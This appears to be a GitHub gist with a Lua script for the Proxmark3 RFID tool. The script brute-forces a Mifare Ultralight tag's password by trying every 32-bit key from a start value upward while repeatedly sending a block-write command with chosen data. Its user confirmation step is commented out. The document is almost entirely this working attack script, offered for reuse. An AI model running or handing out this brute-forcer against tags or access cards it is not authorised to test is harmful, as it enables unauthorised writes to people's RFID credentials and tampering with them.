Skip to content

Instantly share code, notes, and snippets.

@dzervas
Created November 18, 2019 19:52
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save dzervas/a20ae29719f41fd30aa1f6b0811b8c0c to your computer and use it in GitHub Desktop.
Save dzervas/a20ae29719f41fd30aa1f6b0811b8c0c to your computer and use it in GitHub Desktop.
Proxmark3 Mifare Ultralight pin bruteforce
local getopt = require('getopt')
local utils = require('utils')
local function main(args)
key = 0x00000000
byte = 0x04
data = 0x00000000
for o, a in getopt.getopt(args, 'k:b:d:') do
if o == 'k' then key = tonumber(a, 16) end
if o == 'b' then byte = tonumber(a, 16) end
if o == 'd' then data = tonumber(a, 16) end
end
print('Starting bruteforce from key 0x' .. ('%08x'):format(key) .. ' to write to address 0x' .. ('%02x'):format(byte) .. ' data 0x' .. ('%08x'):format(data))
--if utils.confirm('Start bruteforcing?') then
for i = key,0xFFFFFFFF,1 do
print('Trying key ' .. ('%08x'):format(i))
print('hf mfu wrbl b ' .. ('%02x'):format(byte) .. ' d ' .. ('%08x'):format(data) .. ' k ' .. ('%08x'):format(i))
res = core.console('hf mfu wrbl b ' .. ('%02x'):format(byte) .. ' d ' .. ('%08x'):format(data) .. ' k ' .. ('%08x'):format(i))
end
--end
end
main(args)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment